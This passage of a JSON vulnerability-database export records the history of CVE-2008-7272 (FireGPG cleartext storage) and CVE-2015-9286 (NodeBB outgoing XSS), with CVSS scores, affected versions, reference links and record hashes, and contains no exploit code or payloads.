"1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": 